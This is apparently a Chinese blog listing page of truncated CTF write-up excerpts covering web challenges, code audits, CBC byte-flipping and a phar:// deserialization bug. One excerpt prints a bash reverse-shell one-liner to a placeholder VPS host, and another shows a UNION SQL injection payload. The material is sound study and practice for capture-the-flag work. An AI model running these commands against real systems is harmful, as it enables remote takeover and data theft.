原创 實驗吧部分題wp

看起來有點難 這道題有點坑,打開頁面去試下登錄,發現輸入admin/admin會報登錄失敗,錯誤的用戶名和密碼,其他的就說數據庫沒有連上,一開始真的以爲沒有連上.............. 然後後面看了下別人的評論,題目沒錯,那就可能是除

原创 solve me(web wp)

warm up 逆着解下碼 <?php $chars = "1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY="; echo hex2bin(strrev(bin2hex((bas

原创 NSCTF web200-實驗吧

這道題是一題解密題,題目給出了密文和加密程序,然後看着他寫出解密腳本就行了加密程序大概是這樣 public function encode($str) { $res = ""; $_o = strr

原创 貓抓老鼠&what the fuck!這是什麼鬼東西?-實驗吧

貓抓老鼠就打開網頁沒看到有什麼東西,只是要輸入一個key,隨便亂輸入就看見他返回一個有點奇怪的東西然後把它當做key輸進去就拿到flag了,不知這道題究竟在考什麼...........可能是我太菜了,看不出,感覺flag出來的有點快...

原创 你真的會PHP嗎?&Forms-實驗吧

你真的會php嗎?進去看見have a fun!!   emmm.......一點都不fun........然後響應頭看見hint,訪問試下然後就看見後臺源碼了<?php $info = ""; $req = []; $flag="xx

原创 第一屆桂林電子科技大學綠盟杯CTF大賽 wp

misc音頻分析拿到一個wav文件,用audacity打開看見很明顯是摩斯電碼..-. .-.. .- --. .. ... -- --- .-. ... . -.... -.... -.... --. ..- . - --.- .-- 

原创 拐彎抹角&FALSE-實驗吧

最近事是真的多,之前做的題的wp到了現在才寫,鹹魚了.............拐彎抹角這道題進去就看見源碼,沒錯了,就是代碼審計啊啊啊啊啊題不難,但是確實有學習意義,就貼一貼 <?php // code by SEC@USTC echo

原创 who are you?-實驗吧

who are you?這道題點開看見your ip is :xxx.xxx.xx.xxx然後試了巨久改ip,改了一堆了還是撤都沒有然後看了大佬的wp的說是時間盲注,試了一下,確實有延遲,然後就用腳本進行時間盲注了爆數據庫#-*-codi

原创 博客搬家啦

博客搬家咯,溜了溜了,搬去github了 https://xi4or0uji.github.io/

原创 一個phar://的漏洞

前段時間打了個護網杯,題目質量是真的高,肉雞又菜了一整場,遇到了一個不太會的東西,復現了一波,記錄下好吧。 這個鬼東西就是phar://的序列化的漏洞 介紹一下 phar://跟php://filter 、data://那些一樣,都是流包

原创 linux下反彈shell

最近做了幾題都是反彈shell,總結一哈 bash bash -i >& /dev/tcp/vps_ip/端口號 0>&1 bash -i 生成一個交互式的子進程 &表示在Linux後臺運行 /dev/tcp/vps_ip/端口號 其實是

原创 cbc字節翻轉攻擊

本來很久之前就應該把它學了,但是不能靜下心看完,拖到現在......... 今天上課的時候跟cg一起看,抱着神仙的大腿將它看完了,cg牛逼!! 首先我們先看下他的加密過程 可以看到,它先將明文進行分塊,第一塊與初始變量異或,然後祕鑰進行

原创 bee-box

這篇博客就是爲了記下bee-box做題過程,隨便記記,免得忘了 安裝 先去官網下載了,然後分個新的盤單獨放進去,打開虛擬機,雙擊bee-box.vmx就能安裝了 打開裏面的火狐會自動跳去一個登錄界面,默認賬號和密碼是bee/bug,登錄然

原创 hackme(web wp)

oj說了不要直接給flag,所以就只寫思路啦~ hide and seek 源碼就有了 Guestbook 這題是SQL注入 看數據庫 ?mod=read&id=-1 union select 1,2,database(),4# 然後就看

原创 bugku(代碼審計 wp)

extract變量覆蓋 源碼 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)){ $content=trim(file_get_contents($flag));